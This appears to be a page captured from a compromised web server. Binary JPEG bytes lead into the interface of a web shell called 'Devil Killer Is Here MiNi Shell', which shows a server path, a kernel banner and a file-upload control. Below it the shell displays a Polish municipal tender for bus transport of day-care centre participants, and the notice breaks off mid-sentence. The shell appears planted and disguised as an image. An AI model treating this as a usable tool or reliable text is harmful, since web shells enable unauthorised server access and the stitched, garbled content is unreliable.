JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221217/0050223901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczestników na zajęcia ŚDS w Janowcu Kościelnym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JANOWIEC KOŚCIELNY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743019</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Janowiec Kościelny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">13-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">89 6262002</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sds@janowiec.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">janowiec.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczestników na zajęcia ŚDS w Janowcu Kościelnym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-614f66fd-7df0-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00502239</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00011922/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczestników na zajęcia ŚDS Janowiec Kościelny</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem: /281101/SkrytkaESP oraz poczty elektronicznej pod adresem: sds@janowiec.com.pl<br/><br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji”.<br/><br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/><br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/><br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344 ze zm.).<br/><br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 PZP, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w pkt 13.7) SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem referencyjnym przedmiotowego postępowania.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje: <br/>1.	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Janowiec Kościelny. Siedzibą Wójta Gminy Janowiec Kościelny jest Urząd Gminy Janowiec Kościelny, Janowiec Kościelny 62, 13-111 Janowiec Kościelny;<br/>2.	Podanie danych osobowych w celu prowadzenia postępowania o udzielenie zamówienia publicznego nr GT.271.7.2021 pn.: „Dowóz uczestników na zajęcia ŚDS w Janowcu Kościelnym” jest obowiązkowe. Przetwarzanie danych jest obowiązkiem prawnym nałożonym na administratora, w związku z realizacją ustawy Prawo zamówień publicznych;<br/>3.	Podane dane osobowe będą przetwarzane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego lub dłużej jeżeli wynika to z innych przepisów unijnych, krajowych oraz umów zawartych w wyniku tego postępowania;<br/>4.	Odbiorcami danych osobowych będą <br/>	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy PZP. <br/>	w celu zapewnienia stałego dostępu do danych osobowych, ich skutecznego, bezbłędnego i bezpiecznego przetwarzania, rozwoju i utrzymania systemów informatycznych dane będą udostępniane dostawcom wykorzystywanych przez nas systemów informatycznych z zachowaniem poufności i bezpieczeństwa przetwarzania.<br/>	w przypadku korzystania przez uprawnione podmioty z prawa do odwołania wobec naruszenia przez administratora przepisów prawa zamówień publicznych, odwołującym mogą być udostępniane informacje o wyrokach skazujących, naruszeniach prawa i powiązanych z tym środkach bezpieczeństwa (o których mowa w art. 10 rozporządzenia ogólnego o ochronie danych).<br/>5.	W związku z przetwarzaniem przysługują Pani/Panu następujące prawa:<br/>	prawo dostępu do danych osobowych;<br/>	prawo żądania sprostowania danych osobowych, bez wpływu na wynik postępowania o udzielenie zamówienia publicznego;<br/>	prawo żądania ograniczenia przetwarzania danych osobowych, które może być realizowane dopiero po zakończeniu postepowania o udzielenie zamówienia publicznego<br/>	prawo do wniesienia skargi dotyczącej przetwarzania do Prezesa Urzędu Ochrony Danych Osobowych;<br/>6.	Administrator powołał Inspektora Ochrony Danych, z którym można kontaktować się w sprawach związanych z przetwarzaniem danych osobowych pisemnie na adres wyżej wskazany lub poprzez adres e-mail: iod@janowiec.com.pl;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GT.271.12.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Usługa transportowa- dowóz uczestników ŚDS-w szczególności osób niepełnosprawnych na zajęcia z miejsca zamieszkania z terenu Gmin: <br/>•	Janowiec Kościelny (m.in. Janowiec Kościelny, Połcie Młode, Kuce, Smolany, Szczepkowo Borowe, Waśniewo Grabowo, Bielawy, Nowa Wieś Pokrzywnica, Bukowiec Wielki, Zalesie, Szczepkowo Pawełki )<br/>•	Janowo (m.in. Szemplino Czarne, Ruskowo, Zaborowo, Janowo, Zaborowo, Jagarzewo, Muszaki, Róg, Ryki Borkowo, Jagarzewo, Komorowo, Zachy)<br/>•	-Nidzica (m.in. Łysakowo, miasto Nidzica, Kamionka, Waszulki, Magdaleniec)<br/><br/>do miejscowości Janowiec Kościelny -na zajęcia ŚDS- i odwóz z tej miejscowości do miejsca zamieszkania. <br/><br/>Średnia ilość km miesięcznie: 9000 <br/>Średnia ilość km rocznie: 108000<br/><br/>2.	Ilość osób dowożonych/uczestników ŚDS- stan na dzień 07.12.2022r. wynosi 82 osoby. Ilość osób dowożonych może zwiększyć się do 100. Rotacja osób/uczestników ŚDS może warunkować trasy przewozu osób, które mogą ulegać zmianom.<br/><br/>3.	Zakres świadczonych usług będzie obejmował w szczególności: <br/>1)	codziennie od poniedziałku do piątku z wyłączeniem dni świątecznych i wolnych od pracy dowożenie uczestników ŚDS na godzinę -najpóźniej 8.00 zgodnie z harmonogramem dostarczanym Wykonawcy dzień przed wyjazdem.<br/>2)	codziennie od poniedziałku do piątku z wyłączeniem dni świątecznych i wolnych od pracy odwożenie uczestników ŚDS od godzinny 14.00 zgodnie z harmonogramem dostarczanym Wykonawcy dzień przed wyjazdem.<br/>4.	W czasie wakacji przewiduje się przerwę trwającą 15 kolejnych dni roboczych, o terminie której Wykonawca zostanie wcześniej poinformowany. W czasie tej przerwy uczestnicy nie będą dowożeni.<br/>5.	Do przewozu osób Wykonawca zapewnia wyłącznie transport w postaci busów: minimum 20 osobowe i maksymalnie 25 osobowe. Ze względu na organizację tras ale także godzin dowozu i odwozu Uczestników przewiduje się użytkowanie 4 busów do następujących kursów:<br/><br/>I KURS: Janowiec Kościelny-Muszaki-Grabowo-Więckowo-Jagarzewo-Ruskowo-Róg-Janowo-Giewarty-Szczepkowo-Borowe-Janowiec Kościelny <br/>– wyjazd z Janowca Kościelnego ok 6.30/ Trasa ok 125 dziennie<br/><br/>II KURS: Janowiec Kościelny- Łysakowo- Nidzica- Kamionka- Gniadki- Zabłocie- Janowiec Kościelny<br/>- wyjazd z Janowca Kościelnego ok 6.30<br/><br/>II KURS – II trasa: Janowiec Kościelny- Safronka- Leśniki- Janowiec Kościelny<br/> Trasa ok 125 km dziennie<br/> <br/> III KURS: Janowiec Kościelny- Zembrzus- Szemplino- Zaborowo- Waśniewo- Bielawy- <br/> Nowa Wieś- Bukowiec- Zalesie- Pawełki- Pokrzywnica- Janowiec Kościelny<br/> – wyjazd z Janowca Kościelnego ok 6.30/ Trasa ok 100 dziennie<br/><br/>IV KURS: Janowiec Kościelny- Waszulki- Nidzica- Smolany- Połcie Młode- Kuce- Janowiec Kościelny <br/> – wyjazd z Janowca Kościelnego ok 6.30/ Trasa ok 100 dziennie<br/><br/>6.	Czas pobytu podopiecznych w dowozie nie może przekroczyć:90 minut<br/>7.	Środki transportu będą przystosowane do przewozu osób niepełnosprawnych.<br/>8.	W okresie jesienno-zimowym pojazdy dowożące muszą być ogrzewane.<br/>9.	W razie uszkodzenia pojazdu wykonującego dowozy uczestników lub awarii, Wykonawca jest zobowiązany do podstawienia pojazdu zastępczego o odpowiedniej liczbie miejsc, spełniającego właściwe wymagania techniczne w ruchu drogowym.<br/>10.	Nadzorowanie i realizowanie procedur związanych z kontrolą stanu technicznego pojazdów będzie sprawować Wykonawca.<br/>11.	Przewoźnik powinien posiadać wszelkie aktualne badania techniczne pojazdów, opłacone składki obowiązkowego ubezpieczenia pojazdów przewidzianych do realizacji niniejszego zamówienia, a także koncesji, licencji, zezwoleń, wszelkich dopuszczeń, itp. związanych ze świadczeniem usługi polegającej na przewozie/transportowaniu osób, w tym niepełnosprawnych.<br/>12.	Wszyscy kierowcy pojazdów, muszą posiadać wymagane przepisami prawa uprawnienia i odpowiednie kwalifikacje, a także posiadać odpowiednie umiejętności i doświadczenie zapewniające bezpieczeństwo pasażerów.<br/>13.	Realizacja przewozów odbywać się będzie zgodnie z rozkładem dowozów przedstawionym i zaakceptowanym przez Zamawiającego.<br/>14.	Transport okazjonalny: transport uczestników na pikniki, spotkania integracyjne, do placówek służby zdrowia itp.- transport okazjonalny, w tym liczba osób uzależniony będzie od aktualnego zapotrzebowania i zgłoszony oraz uzgodniony z Wykonawcą co najmniej tydzień wcześniej.<br/>15.	Zamawiający nie pokrywa kosztów dojazdów z siedziby Wykonawcy do placówek ŚDS. Wykonawca będzie zobowiązany do realizacji zamówienia zgodnie z treścią zapytania ofertowego i złożonej oferty, postanowieniami umowy, a także zgodnie z powszechnie obowiązującymi przepisami prawa.<br/>16.	Wykonawca będzie prowadził ewidencję tras przewozu w formie dziennych i miesięcznych samochodowych kart drogowych, wg wzoru ustalonego przez Zleceniodawcę. Karty te będą zatwierdzane pod względem merytorycznym przez dyrektora placówki, tj. dyrektora Środowiskowego Domu Samopomocy na koniec każdego miesiąca.<br/>17.	Zamawiający będzie sprawował opiekę nad przewożonymi uczestnikami ŚDS. <br/>18.	Zamawiający nie zapewnia pomieszczenia socjalnego dla pracowników/kierowców Wykonawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy PZP/zamówienia polegającego na powtórzeniu podobnych, których całkowita, łączna wartość nie przekroczy 20% wartości zamówienia podstawowego. Zakres możliwych do udzielenia zamówień uzupełniających może polegać na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego, w szczególności: - świadczenie usług poza okresem 02.01.2023 rok – 31.12.2023 rok, - zwiększenie liczby tras objętych usługami, - zwiększenie liczby osób do przewozu</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ustala się następujące kryteria oceny ofert:<br/><br/>- cena ofertowa brutto – znaczenie: 100 pkt.<br/><br/>KC = CN/COB x 100<br/><br/>Gdzie:<br/>KC - ilość punktów przyznanych Wykonawcy<br/>CN - najniższa zaoferowana cena w PLN, spośród wszystkich ofert nie podlegających odrzuceniu<br/>COB - cena w PLN zaoferowana w ofercie badanej<br/><br/>2.	Maksymalna łączna liczba punktów jaką może uzyskać Wykonawca wynosi – 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Wykonawca posiada uprawnienia do prowadzenia określonej działalności, gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wnioskodawca spełnia warunek jeżeli: <br/>Wykaże posiadanie uprawnień do wykonywania przewozu osób w krajowym transporcie drogowym zgodnie z wymaganiami określonymi w ustawie z dn. 6 września 2001 r. o transporcie drogowym (t.j.: Dz.U. z 2022 r. poz. 2201) <br/><br/>2) Wykonawca posiada zdolności technicznej lub zawodowej:<br/>Wykonawca dysponuje lub będzie dysponować środkami transportu, którym świadczona będzie usługa spełniającymi wymogi bezpieczeństwa i warunki techniczne określone odrębnymi przepisami oraz posiadać aktualne obowiązkowe ubezpieczenie OC i NW oraz aktualne badania techniczne dopuszczające pojazd do ruchu, z ilością miejsc siedzących dla pasażerów dostosowaną do części zamówienia o które się ubiega (rozdział 1 pkt.5). <br/>Wykonawca dysponuje lub będzie dysponować osobami skierowanymi do realizacji zamówienia tj. kierowcami posiadającymi uprawnienia do kierowania pojazdem przeznaczonym do świadczenia usługi (prawo jazdy kategorii D) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2.	Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale 2 podrozdziałach 6 i 7 SWZ. <br/>3.	Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4.	Oświadczenie składają odrębnie:<br/>-	wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>-	podmiot trzeci, na którego potencjał powołuje się wykonawca.<br/>5.	Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 i 6 ustawy PZP, wykonawca nie podlega wykluczeniu jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne;<br/>2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania lub zamawiającym;<br/>3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,<br/>b) zreorganizował personel,<br/>c) wdrożył system sprawozdawczości i kontroli,<br/>d) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów,<br/>e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.<br/>6.	Do oferty wykonawca załącza również:<br/>a)	Pełnomocnictwo <br/>b)	Przedmiotowe środki dowodowe wskazane w rozdziale 2 podrozdziale 4<br/>Zamawiający nie żąda przedmiotowych środków dowodowych wskazanych w rozdziale 2 podrozdziale 4 <br/>c)	Zobowiązanie podmiotu trzeciego (załącznik nr 1a do SWZ)<br/>d)	Formularz cenowy (załącznik nr 2 do SWZ) <br/>e)	Wadium<br/>Zamawiający przewiduje wniesienie wadium przetargowego przed upływem terminu składania ofert. Wadium wnoszone w pieniądzu 